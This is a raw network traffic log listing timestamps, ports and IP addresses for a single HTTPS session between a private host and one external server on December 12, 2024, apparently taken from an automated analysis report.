Dec 12, 2024 13:05:23.066171885 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.066189051 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.068120003 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.206413031 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.206444025 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.206516027 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.206542969 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.206612110 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.213562012 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.213582993 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.213649035 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.213666916 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.213721991 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.221240997 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.221265078 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.221337080 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.221349001 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.222047091 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.227957964 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.227978945 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.228071928 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.228094101 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.228472948 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.235630989 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.235656977 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.235734940 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.235744953 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.235786915 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.242887020 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.242913008 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.242973089 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.242980003 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.243031025 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.247209072 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.247279882 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.247288942 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.248416901 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.248466969 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.248476982 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.248523951 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.250793934 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.250863075 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.252707958 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.252764940 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.256237030 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.256303072 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.256309986 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.258249998 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.258302927 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.258310080 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.258373022 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.259459019 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.259526968 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.263732910 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.263822079 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.263829947 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.263919115 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.400186062 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.400288105 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.400315046 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.404551983 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.404628992 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.404648066 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.405627012 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.405724049 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.405735016 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.405865908 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.409960032 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.410085917 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.410098076 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.416739941 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.416760921 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.416801929 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.416810989 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.416857004 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.422215939 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.422266960 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.422321081 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.422334909 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.422364950 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.422378063 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.429917097 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.429938078 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.430011034 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.430032015 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.430062056 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.430093050 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.435976028 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.436021090 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.436057091 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.436062098 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.436091900 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.442819118 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.442837000 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.442895889 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.442903996 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.442956924 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.444746017 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.444817066 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.452512026 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.452531099 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.452644110 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.452651978 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.453605890 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.591226101 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.591285944 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.591362000 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.591379881 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.591399908 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.594784021 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.594891071 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.594902039 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.597950935 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.598016024 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.598022938 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.602236986 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.602334023 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.602341890 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.603455067 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.603529930 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.603535891 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.603630066 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.608983040 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.609014988 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.609047890 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.609054089 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.609088898 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.616733074 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.616759062 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.616852045 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.616861105 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.624435902 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.624460936 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.624506950 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.624516010 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.624545097 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.631540060 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.631558895 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.631643057 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.631653070 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.631675959 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.639739990 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.639765024 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.639816999 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.639826059 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.639859915 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.646322966 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.646344900 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.646393061 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.646401882 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.646481991 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.786897898 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.786921978 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.787040949 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.787065029 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.787092924 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.787117958 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.794536114 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.794552088 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.794636011 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.794642925 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.794717073 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.802239895 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.802258015 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.802339077 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.802346945 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.802400112 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.809053898 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.809071064 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.809179068 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.809187889 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.809400082 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.817248106 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.817270041 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.817347050 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.817359924 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.817555904 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.823909998 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.823926926 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.824013948 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.824018955 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.824070930 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.831520081 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.831546068 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.831621885 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.831626892 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.831669092 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.839339972 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.839354992 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.839410067 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.839413881 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.839483023 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.980277061 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.980294943 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.980424881 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.980432987 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.980469942 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.987878084 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.987893105 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.987972975 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.987976074 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.988013029 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.995635986 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.995651960 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.995738983 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:23.995745897 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:23.995784044 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.002346992 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.002362967 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.002434015 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.002438068 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.002473116 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.010050058 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.010066032 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.010133982 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.010137081 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.010183096 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.017236948 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.017252922 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.017313004 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.017316103 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.017359972 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.024936914 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.024952888 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.025003910 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.025007963 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.025042057 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.032754898 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.032772064 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.032833099 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.032838106 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.032865047 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.194830894 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.194853067 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.194941044 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.194967031 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.195005894 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.202567101 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.202584028 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.202655077 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.202660084 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.202692032 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.210202932 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.210222006 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.210270882 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.210275888 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.210323095 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.216933966 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.216950893 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.217009068 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.217014074 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.217051029 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.224649906 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.224668026 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.224742889 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.224749088 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.224797010 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.232328892 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.232347965 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.232409954 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.232414961 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.232467890 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.239608049 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.239626884 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.239691973 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.239696026 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.239737034 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.247189999 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.247206926 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.247271061 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.247275114 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.247323036 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.387437105 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.387464046 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.387556076 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.387582064 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.387638092 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.395050049 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.395080090 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.395186901 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.395194054 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.395246983 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.402877092 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.402904987 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.402981043 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.402987003 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.403039932 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.409543037 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.409571886 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.409619093 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.409624100 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.409657955 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.409674883 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.417262077 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.417289019 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.417349100 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.417367935 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.417387009 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.417407990 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.424396992 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.424422026 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.424509048 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.424534082 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.425992966 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.432017088 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.432046890 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.432120085 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.432141066 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.432153940 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.432183981 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.439825058 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.439857960 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.439927101 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.439945936 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.439960003 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.439989090 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.579636097 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.579664946 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.579778910 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.579806089 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.580919027 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.587367058 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.587403059 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.587485075 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.587496996 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.588047028 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.594928026 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.594959021 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.594994068 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.595002890 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.595052004 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.601650000 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.601679087 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.601788044 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.601795912 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.601840019 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.609364033 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.609394073 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:24.609508991 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:24.609517097 CET	443	49726	172.65.251.78	192.168.2.6
